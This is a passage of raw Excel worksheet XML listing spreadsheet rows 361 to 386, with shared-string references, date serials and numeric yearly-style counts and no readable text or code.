        <v>44419.612771296299</v>
      </c>
      <c r="C361" s="95" t="s">
        <v>1321</v>
      </c>
      <c r="D361" s="96">
        <v>100</v>
      </c>
      <c r="E361" s="95" t="s">
        <v>1322</v>
      </c>
      <c r="F361" s="42">
        <v>100</v>
      </c>
      <c r="G361" s="95" t="s">
        <v>1323</v>
      </c>
      <c r="H361" t="s">
        <v>1324</v>
      </c>
      <c r="I361" t="s">
        <v>196</v>
      </c>
      <c r="J361" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K361" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L361" t="s">
        <v>77</v>
      </c>
      <c r="M361" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N361" t="s">
        <v>198</v>
      </c>
      <c r="Q361" s="95" t="s">
        <v>1325</v>
      </c>
      <c r="W361" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="362" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A362" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B362" s="52">
        <v>44482.344109907404</v>
      </c>
      <c r="C362" s="95" t="s">
        <v>1326</v>
      </c>
      <c r="D362" s="96">
        <v>101</v>
      </c>
      <c r="E362" s="95" t="s">
        <v>1327</v>
      </c>
      <c r="F362" s="42">
        <v>101</v>
      </c>
      <c r="G362" s="95" t="s">
        <v>1328</v>
      </c>
      <c r="H362" t="s">
        <v>1329</v>
      </c>
      <c r="I362" t="s">
        <v>172</v>
      </c>
      <c r="J362" s="95" t="s">
        <v>1238</v>
      </c>
      <c r="K362" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L362" t="s">
        <v>77</v>
      </c>
      <c r="M362" s="95" t="s">
        <v>1330</v>
      </c>
      <c r="N362" t="s">
        <v>522</v>
      </c>
      <c r="Q362" s="95" t="s">
        <v>1331</v>
      </c>
      <c r="R362">
        <v>27</v>
      </c>
      <c r="S362">
        <v>61</v>
      </c>
      <c r="T362">
        <v>27</v>
      </c>
      <c r="U362">
        <v>24</v>
      </c>
      <c r="V362">
        <v>89</v>
      </c>
      <c r="W362" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="363" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A363" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B363" s="52">
        <v>44313.458974224537</v>
      </c>
      <c r="C363" s="95" t="s">
        <v>1332</v>
      </c>
      <c r="D363" s="96">
        <v>100</v>
      </c>
      <c r="E363" s="95" t="s">
        <v>1333</v>
      </c>
      <c r="F363" s="42">
        <v>100</v>
      </c>
      <c r="G363" s="95" t="s">
        <v>1334</v>
      </c>
      <c r="H363" t="s">
        <v>1335</v>
      </c>
      <c r="I363" t="s">
        <v>611</v>
      </c>
      <c r="J363" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K363" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L363" t="s">
        <v>77</v>
      </c>
      <c r="M363" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N363" t="s">
        <v>1098</v>
      </c>
      <c r="O363" s="95" t="s">
        <v>1336</v>
      </c>
      <c r="Q363" s="95" t="s">
        <v>1337</v>
      </c>
      <c r="R363">
        <v>23170</v>
      </c>
      <c r="S363">
        <v>49335</v>
      </c>
      <c r="T363">
        <v>25980</v>
      </c>
      <c r="U363">
        <v>29402</v>
      </c>
      <c r="V363">
        <v>36749</v>
      </c>
      <c r="W363" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="364" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A364" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B364" s="52">
        <v>44313.609465381945</v>
      </c>
      <c r="C364" s="95" t="s">
        <v>1338</v>
      </c>
      <c r="D364" s="96">
        <v>101</v>
      </c>
      <c r="E364" s="95" t="s">
        <v>1339</v>
      </c>
      <c r="F364" s="42">
        <v>101</v>
      </c>
      <c r="G364" s="95" t="s">
        <v>1340</v>
      </c>
      <c r="H364" t="s">
        <v>1341</v>
      </c>
      <c r="I364" t="s">
        <v>611</v>
      </c>
      <c r="J364" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K364" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L364" t="s">
        <v>77</v>
      </c>
      <c r="M364" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N364" t="s">
        <v>1098</v>
      </c>
      <c r="Q364" s="95" t="s">
        <v>1342</v>
      </c>
      <c r="R364">
        <v>327517</v>
      </c>
      <c r="S364">
        <v>345337</v>
      </c>
      <c r="T364">
        <v>294764</v>
      </c>
      <c r="U364">
        <v>351097</v>
      </c>
      <c r="V364">
        <v>456909</v>
      </c>
      <c r="W364" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="365" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A365" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B365" s="52">
        <v>44495.743048506942</v>
      </c>
      <c r="C365" s="95" t="s">
        <v>1343</v>
      </c>
      <c r="D365" s="96">
        <v>121</v>
      </c>
      <c r="E365" s="95" t="s">
        <v>1344</v>
      </c>
      <c r="F365" s="42">
        <v>101</v>
      </c>
      <c r="G365" s="95" t="s">
        <v>1345</v>
      </c>
      <c r="H365" t="s">
        <v>1346</v>
      </c>
      <c r="I365" t="s">
        <v>611</v>
      </c>
      <c r="J365" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K365" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L365" t="s">
        <v>77</v>
      </c>
      <c r="M365" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N365" t="s">
        <v>1098</v>
      </c>
      <c r="O365" s="95" t="s">
        <v>1347</v>
      </c>
      <c r="Q365" s="95" t="s">
        <v>1348</v>
      </c>
      <c r="R365">
        <v>5080</v>
      </c>
      <c r="S365">
        <v>12534</v>
      </c>
      <c r="T365">
        <v>13396</v>
      </c>
      <c r="U365">
        <v>17380</v>
      </c>
      <c r="V365">
        <v>41948</v>
      </c>
      <c r="W365" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="366" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A366" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B366" s="52">
        <v>44495.743048750002</v>
      </c>
      <c r="C366" s="95" t="s">
        <v>1343</v>
      </c>
      <c r="D366" s="96">
        <v>121</v>
      </c>
      <c r="E366" s="95" t="s">
        <v>1349</v>
      </c>
      <c r="F366" s="42">
        <v>100</v>
      </c>
      <c r="G366" s="95" t="s">
        <v>1350</v>
      </c>
      <c r="H366" t="s">
        <v>1351</v>
      </c>
      <c r="I366" t="s">
        <v>611</v>
      </c>
      <c r="J366" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K366" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L366" t="s">
        <v>77</v>
      </c>
      <c r="M366" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N366" t="s">
        <v>1098</v>
      </c>
      <c r="O366" s="95" t="s">
        <v>1352</v>
      </c>
      <c r="Q366" s="95" t="s">
        <v>1348</v>
      </c>
      <c r="W366" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="367" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A367" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B367" s="52">
        <v>44495.743048483797</v>
      </c>
      <c r="C367" s="95" t="s">
        <v>1343</v>
      </c>
      <c r="D367" s="96">
        <v>121</v>
      </c>
      <c r="E367" s="95" t="s">
        <v>1353</v>
      </c>
      <c r="F367" s="42">
        <v>201</v>
      </c>
      <c r="G367" s="95" t="s">
        <v>1354</v>
      </c>
      <c r="H367" t="s">
        <v>1355</v>
      </c>
      <c r="I367" t="s">
        <v>611</v>
      </c>
      <c r="J367" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K367" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L367" t="s">
        <v>77</v>
      </c>
      <c r="M367" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N367" t="s">
        <v>1098</v>
      </c>
      <c r="O367" s="95" t="s">
        <v>1356</v>
      </c>
      <c r="Q367" s="95" t="s">
        <v>1348</v>
      </c>
      <c r="R367">
        <v>745</v>
      </c>
      <c r="S367">
        <v>699</v>
      </c>
      <c r="T367">
        <v>607</v>
      </c>
      <c r="U367">
        <v>534</v>
      </c>
      <c r="V367">
        <v>621</v>
      </c>
      <c r="W367" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="368" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A368" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B368" s="52">
        <v>44505.681300208336</v>
      </c>
      <c r="C368" s="95" t="s">
        <v>1357</v>
      </c>
      <c r="D368" s="96">
        <v>100</v>
      </c>
      <c r="E368" s="95" t="s">
        <v>1358</v>
      </c>
      <c r="F368" s="42">
        <v>100</v>
      </c>
      <c r="G368" s="95" t="s">
        <v>1359</v>
      </c>
      <c r="H368" t="s">
        <v>1360</v>
      </c>
      <c r="I368" t="s">
        <v>268</v>
      </c>
      <c r="J368" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K368" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L368" t="s">
        <v>77</v>
      </c>
      <c r="M368" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N368" t="s">
        <v>271</v>
      </c>
      <c r="Q368" s="95" t="s">
        <v>1361</v>
      </c>
      <c r="U368">
        <v>80</v>
      </c>
      <c r="V368">
        <v>79</v>
      </c>
      <c r="W368" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="369" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A369" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B369" s="52">
        <v>44505.681300277778</v>
      </c>
      <c r="C369" s="95" t="s">
        <v>1357</v>
      </c>
      <c r="D369" s="96">
        <v>100</v>
      </c>
      <c r="E369" s="95" t="s">
        <v>1362</v>
      </c>
      <c r="F369" s="42">
        <v>100</v>
      </c>
      <c r="G369" s="95" t="s">
        <v>1363</v>
      </c>
      <c r="H369" t="s">
        <v>1364</v>
      </c>
      <c r="I369" t="s">
        <v>268</v>
      </c>
      <c r="J369" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K369" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L369" t="s">
        <v>77</v>
      </c>
      <c r="M369" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N369" t="s">
        <v>271</v>
      </c>
      <c r="Q369" s="95" t="s">
        <v>1361</v>
      </c>
      <c r="R369">
        <v>67</v>
      </c>
      <c r="S369">
        <v>418</v>
      </c>
      <c r="T369">
        <v>223</v>
      </c>
      <c r="U369">
        <v>647</v>
      </c>
      <c r="V369">
        <v>975</v>
      </c>
      <c r="W369" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="370" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A370" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B370" s="52">
        <v>44505.681300266202</v>
      </c>
      <c r="C370" s="95" t="s">
        <v>1357</v>
      </c>
      <c r="D370" s="96">
        <v>100</v>
      </c>
      <c r="E370" s="95" t="s">
        <v>1365</v>
      </c>
      <c r="F370" s="42">
        <v>100</v>
      </c>
      <c r="G370" s="95" t="s">
        <v>1366</v>
      </c>
      <c r="H370" t="s">
        <v>1367</v>
      </c>
      <c r="I370" t="s">
        <v>268</v>
      </c>
      <c r="J370" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K370" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L370" t="s">
        <v>77</v>
      </c>
      <c r="M370" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N370" t="s">
        <v>271</v>
      </c>
      <c r="Q370" s="95" t="s">
        <v>1361</v>
      </c>
      <c r="R370">
        <v>5220</v>
      </c>
      <c r="S370">
        <v>4317</v>
      </c>
      <c r="T370">
        <v>6269</v>
      </c>
      <c r="U370">
        <v>6332</v>
      </c>
      <c r="V370">
        <v>5931</v>
      </c>
      <c r="W370" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="371" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A371" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B371" s="52">
        <v>44320.592346851852</v>
      </c>
      <c r="C371" s="95" t="s">
        <v>1368</v>
      </c>
      <c r="D371" s="96">
        <v>111</v>
      </c>
      <c r="E371" s="95" t="s">
        <v>1369</v>
      </c>
      <c r="F371" s="42">
        <v>101</v>
      </c>
      <c r="G371" s="95" t="s">
        <v>1370</v>
      </c>
      <c r="H371" t="s">
        <v>1371</v>
      </c>
      <c r="I371" t="s">
        <v>611</v>
      </c>
      <c r="J371" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K371" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L371" t="s">
        <v>77</v>
      </c>
      <c r="M371" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N371" t="s">
        <v>1098</v>
      </c>
      <c r="O371" s="95" t="s">
        <v>1372</v>
      </c>
      <c r="Q371" s="95" t="s">
        <v>1373</v>
      </c>
      <c r="V371">
        <v>48</v>
      </c>
      <c r="W371" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="372" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A372" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B372" s="52">
        <v>44320.592346874997</v>
      </c>
      <c r="C372" s="95" t="s">
        <v>1368</v>
      </c>
      <c r="D372" s="96">
        <v>111</v>
      </c>
      <c r="E372" s="95" t="s">
        <v>1374</v>
      </c>
      <c r="F372" s="42">
        <v>102</v>
      </c>
      <c r="G372" s="95" t="s">
        <v>1375</v>
      </c>
      <c r="H372" t="s">
        <v>1376</v>
      </c>
      <c r="I372" t="s">
        <v>611</v>
      </c>
      <c r="J372" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K372" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L372" t="s">
        <v>77</v>
      </c>
      <c r="M372" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N372" t="s">
        <v>1098</v>
      </c>
      <c r="O372" s="95" t="s">
        <v>1377</v>
      </c>
      <c r="P372" t="s">
        <v>612</v>
      </c>
      <c r="Q372" s="95" t="s">
        <v>1373</v>
      </c>
      <c r="U372">
        <v>3</v>
      </c>
      <c r="V372">
        <v>37</v>
      </c>
      <c r="W372" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="373" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A373" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B373" s="52">
        <v>44655.658999687497</v>
      </c>
      <c r="C373" s="95" t="s">
        <v>1378</v>
      </c>
      <c r="D373" s="96">
        <v>100</v>
      </c>
      <c r="E373" s="95" t="s">
        <v>1379</v>
      </c>
      <c r="F373" s="42">
        <v>100</v>
      </c>
      <c r="G373" s="95" t="s">
        <v>1380</v>
      </c>
      <c r="H373" t="s">
        <v>1381</v>
      </c>
      <c r="I373" t="s">
        <v>611</v>
      </c>
      <c r="J373" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K373" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L373" t="s">
        <v>77</v>
      </c>
      <c r="M373" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N373" t="s">
        <v>1098</v>
      </c>
      <c r="Q373" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W373" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="374" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A374" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B374" s="52">
        <v>44790.693671215275</v>
      </c>
      <c r="C374" s="95" t="s">
        <v>1382</v>
      </c>
      <c r="D374" s="96">
        <v>112</v>
      </c>
      <c r="E374" s="95" t="s">
        <v>1383</v>
      </c>
      <c r="F374" s="42">
        <v>112</v>
      </c>
      <c r="G374" s="95" t="s">
        <v>1384</v>
      </c>
      <c r="H374" t="s">
        <v>1351</v>
      </c>
      <c r="I374" t="s">
        <v>611</v>
      </c>
      <c r="J374" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K374" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L374" t="s">
        <v>77</v>
      </c>
      <c r="M374" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N374" t="s">
        <v>1098</v>
      </c>
      <c r="O374" s="95" t="s">
        <v>1352</v>
      </c>
      <c r="Q374" s="95" t="s">
        <v>1385</v>
      </c>
      <c r="W374" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="375" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A375" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B375" s="52">
        <v>44154.744477476852</v>
      </c>
      <c r="C375" s="95" t="s">
        <v>1386</v>
      </c>
      <c r="D375" s="96">
        <v>100</v>
      </c>
      <c r="E375" s="95" t="s">
        <v>1387</v>
      </c>
      <c r="F375" s="42">
        <v>100</v>
      </c>
      <c r="G375" s="95" t="s">
        <v>1388</v>
      </c>
      <c r="H375" t="s">
        <v>1389</v>
      </c>
      <c r="I375" t="s">
        <v>185</v>
      </c>
      <c r="J375" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K375" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L375" t="s">
        <v>83</v>
      </c>
      <c r="M375" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O375" s="95" t="s">
        <v>1390</v>
      </c>
      <c r="Q375" s="95" t="s">
        <v>1391</v>
      </c>
      <c r="R375">
        <v>875141</v>
      </c>
      <c r="S375">
        <v>758501</v>
      </c>
      <c r="T375">
        <v>745088</v>
      </c>
      <c r="U375">
        <v>662870</v>
      </c>
      <c r="V375">
        <v>803013</v>
      </c>
      <c r="W375" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="376" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A376" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B376" s="52">
        <v>44331.307228090278</v>
      </c>
      <c r="C376" s="95" t="s">
        <v>1392</v>
      </c>
      <c r="D376" s="96">
        <v>103</v>
      </c>
      <c r="E376" s="95" t="s">
        <v>1393</v>
      </c>
      <c r="F376" s="42">
        <v>103</v>
      </c>
      <c r="G376" s="95" t="s">
        <v>1394</v>
      </c>
      <c r="H376" t="s">
        <v>1355</v>
      </c>
      <c r="I376" t="s">
        <v>611</v>
      </c>
      <c r="J376" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K376" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L376" t="s">
        <v>77</v>
      </c>
      <c r="M376" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N376" t="s">
        <v>1098</v>
      </c>
      <c r="O376" s="95" t="s">
        <v>1395</v>
      </c>
      <c r="Q376" s="95" t="s">
        <v>1396</v>
      </c>
      <c r="R376">
        <v>2606116</v>
      </c>
      <c r="S376">
        <v>2459726</v>
      </c>
      <c r="T376">
        <v>2282047</v>
      </c>
      <c r="U376">
        <v>8581277</v>
      </c>
      <c r="V376">
        <v>9406094</v>
      </c>
      <c r="W376" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="377" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A377" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B377" s="52">
        <v>44335.522551319445</v>
      </c>
      <c r="C377" s="95" t="s">
        <v>1397</v>
      </c>
      <c r="D377" s="96">
        <v>100</v>
      </c>
      <c r="E377" s="95" t="s">
        <v>1398</v>
      </c>
      <c r="F377" s="42">
        <v>100</v>
      </c>
      <c r="G377" s="95" t="s">
        <v>1399</v>
      </c>
      <c r="H377" t="s">
        <v>1355</v>
      </c>
      <c r="I377" t="s">
        <v>611</v>
      </c>
      <c r="J377" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K377" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L377" t="s">
        <v>77</v>
      </c>
      <c r="M377" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N377" t="s">
        <v>1098</v>
      </c>
      <c r="Q377" s="95" t="s">
        <v>1400</v>
      </c>
      <c r="W377" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="378" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A378" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B378" s="52">
        <v>43962.765995185182</v>
      </c>
      <c r="C378" s="95" t="s">
        <v>1401</v>
      </c>
      <c r="D378" s="96">
        <v>100</v>
      </c>
      <c r="E378" s="95" t="s">
        <v>1402</v>
      </c>
      <c r="F378" s="42">
        <v>100</v>
      </c>
      <c r="G378" s="95" t="s">
        <v>1403</v>
      </c>
      <c r="H378" t="s">
        <v>1404</v>
      </c>
      <c r="I378" t="s">
        <v>196</v>
      </c>
      <c r="J378" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K378" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L378" t="s">
        <v>77</v>
      </c>
      <c r="M378" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N378" t="s">
        <v>198</v>
      </c>
      <c r="O378" s="95" t="s">
        <v>1405</v>
      </c>
      <c r="P378" t="s">
        <v>960</v>
      </c>
      <c r="Q378" s="95" t="s">
        <v>1406</v>
      </c>
      <c r="R378">
        <v>60497</v>
      </c>
      <c r="S378">
        <v>46015</v>
      </c>
      <c r="T378">
        <v>45228</v>
      </c>
      <c r="U378">
        <v>44692</v>
      </c>
      <c r="V378">
        <v>37815</v>
      </c>
      <c r="W378" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="379" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A379" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B379" s="52">
        <v>44466.840868703701</v>
      </c>
      <c r="C379" s="95" t="s">
        <v>1401</v>
      </c>
      <c r="D379" s="96">
        <v>120</v>
      </c>
      <c r="E379" s="95" t="s">
        <v>1402</v>
      </c>
      <c r="F379" s="42">
        <v>120</v>
      </c>
      <c r="G379" s="95" t="s">
        <v>1403</v>
      </c>
      <c r="H379" t="s">
        <v>1404</v>
      </c>
      <c r="I379" t="s">
        <v>196</v>
      </c>
      <c r="J379" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K379" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L379" t="s">
        <v>77</v>
      </c>
      <c r="M379" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N379" t="s">
        <v>198</v>
      </c>
      <c r="O379" s="95" t="s">
        <v>1405</v>
      </c>
      <c r="P379" t="s">
        <v>960</v>
      </c>
      <c r="Q379" s="95" t="s">
        <v>1407</v>
      </c>
      <c r="R379">
        <v>60497</v>
      </c>
      <c r="S379">
        <v>46015</v>
      </c>
      <c r="T379">
        <v>45228</v>
      </c>
      <c r="U379">
        <v>44692</v>
      </c>
      <c r="V379">
        <v>37815</v>
      </c>
      <c r="W379" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="380" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A380" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B380" s="52">
        <v>44532.364457488424</v>
      </c>
      <c r="C380" s="95" t="s">
        <v>1408</v>
      </c>
      <c r="D380" s="96">
        <v>203</v>
      </c>
      <c r="E380" s="95" t="s">
        <v>1409</v>
      </c>
      <c r="F380" s="42">
        <v>103</v>
      </c>
      <c r="G380" s="95" t="s">
        <v>1410</v>
      </c>
      <c r="H380" t="s">
        <v>1411</v>
      </c>
      <c r="I380" t="s">
        <v>17</v>
      </c>
      <c r="J380" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K380" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L380" t="s">
        <v>83</v>
      </c>
      <c r="M380" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q380" s="95" t="s">
        <v>1413</v>
      </c>
      <c r="R380">
        <v>5709</v>
      </c>
      <c r="S380">
        <v>4176</v>
      </c>
      <c r="T380">
        <v>2291</v>
      </c>
      <c r="U380">
        <v>813</v>
      </c>
      <c r="V380">
        <v>913</v>
      </c>
      <c r="W380" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="381" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A381" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B381" s="52">
        <v>44473.725267557871</v>
      </c>
      <c r="C381" s="95" t="s">
        <v>1408</v>
      </c>
      <c r="D381" s="96">
        <v>203</v>
      </c>
      <c r="E381" s="95" t="s">
        <v>1414</v>
      </c>
      <c r="F381" s="42">
        <v>101</v>
      </c>
      <c r="G381" s="95" t="s">
        <v>1415</v>
      </c>
      <c r="H381" t="s">
        <v>1416</v>
      </c>
      <c r="I381" t="s">
        <v>17</v>
      </c>
      <c r="J381" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K381" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L381" t="s">
        <v>83</v>
      </c>
      <c r="M381" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q381" s="95" t="s">
        <v>1413</v>
      </c>
      <c r="R381">
        <v>2158</v>
      </c>
      <c r="S381">
        <v>1680</v>
      </c>
      <c r="T381">
        <v>1759</v>
      </c>
      <c r="U381">
        <v>35</v>
      </c>
      <c r="V381">
        <v>18</v>
      </c>
      <c r="W381" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="382" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A382" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B382" s="52">
        <v>44070.571136736115</v>
      </c>
      <c r="C382" s="95" t="s">
        <v>1417</v>
      </c>
      <c r="D382" s="96">
        <v>100</v>
      </c>
      <c r="E382" s="95" t="s">
        <v>1418</v>
      </c>
      <c r="F382" s="42">
        <v>100</v>
      </c>
      <c r="G382" s="95" t="s">
        <v>1419</v>
      </c>
      <c r="H382" t="s">
        <v>1420</v>
      </c>
      <c r="I382" t="s">
        <v>17</v>
      </c>
      <c r="J382" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K382" s="95" t="s">
        <v>36</v>
      </c>
      <c r="L382" t="s">
        <v>83</v>
      </c>
      <c r="M382" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q382" s="95" t="s">
        <v>1421</v>
      </c>
      <c r="T382">
        <v>1748</v>
      </c>
      <c r="U382">
        <v>2877</v>
      </c>
      <c r="V382">
        <v>4520</v>
      </c>
      <c r="W382" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="383" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A383" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B383" s="52">
        <v>44377.710028506946</v>
      </c>
      <c r="C383" s="95" t="s">
        <v>1422</v>
      </c>
      <c r="D383" s="96">
        <v>100</v>
      </c>
      <c r="E383" s="95" t="s">
        <v>1423</v>
      </c>
      <c r="F383" s="42">
        <v>100</v>
      </c>
      <c r="G383" s="95" t="s">
        <v>1424</v>
      </c>
      <c r="H383" t="s">
        <v>1425</v>
      </c>
      <c r="I383" t="s">
        <v>172</v>
      </c>
      <c r="J383" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K383" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L383" t="s">
        <v>83</v>
      </c>
      <c r="M383" s="95" t="s">
        <v>72</v>
      </c>
      <c r="N383" t="s">
        <v>174</v>
      </c>
      <c r="Q383" s="95" t="s">
        <v>151</v>
      </c>
      <c r="R383">
        <v>1</v>
      </c>
      <c r="S383">
        <v>23</v>
      </c>
      <c r="T383">
        <v>736</v>
      </c>
      <c r="U383">
        <v>13533</v>
      </c>
      <c r="V383">
        <v>60179</v>
      </c>
      <c r="W383" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="384" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A384" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B384" s="52">
        <v>44377.710028530091</v>
      </c>
      <c r="C384" s="95" t="s">
        <v>1422</v>
      </c>
      <c r="D384" s="96">
        <v>100</v>
      </c>
      <c r="E384" s="95" t="s">
        <v>1426</v>
      </c>
      <c r="F384" s="42">
        <v>100</v>
      </c>
      <c r="G384" s="95" t="s">
        <v>1427</v>
      </c>
      <c r="H384" t="s">
        <v>1428</v>
      </c>
      <c r="I384" t="s">
        <v>172</v>
      </c>
      <c r="J384" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K384" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L384" t="s">
        <v>83</v>
      </c>
      <c r="M384" s="95" t="s">
        <v>72</v>
      </c>
      <c r="N384" t="s">
        <v>174</v>
      </c>
      <c r="Q384" s="95" t="s">
        <v>151</v>
      </c>
      <c r="W384" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="385" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A385" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B385" s="52">
        <v>44223.633561516202</v>
      </c>
      <c r="C385" s="95" t="s">
        <v>1429</v>
      </c>
      <c r="D385" s="96">
        <v>103</v>
      </c>
      <c r="E385" s="95" t="s">
        <v>1430</v>
      </c>
      <c r="F385" s="42">
        <v>103</v>
      </c>
      <c r="G385" s="95" t="s">
        <v>1431</v>
      </c>
      <c r="H385" t="s">
        <v>1432</v>
      </c>
      <c r="I385" t="s">
        <v>268</v>
      </c>
      <c r="J385" s="95" t="s">
        <v>566</v>
      </c>
      <c r="K385" s="95" t="s">
        <v>12</v>
      </c>
      <c r="L385" t="s">
        <v>77</v>
      </c>
      <c r="M385" s="95" t="s">
        <v>622</v>
      </c>
      <c r="N385" t="s">
        <v>623</v>
      </c>
      <c r="Q385" s="95" t="s">
        <v>1433</v>
      </c>
      <c r="U385">
        <v>2</v>
      </c>
      <c r="V385">
        <v>2</v>
      </c>
      <c r="W385" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="386" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A386" s="95" t="s">
        <v>4</v>
      </c>
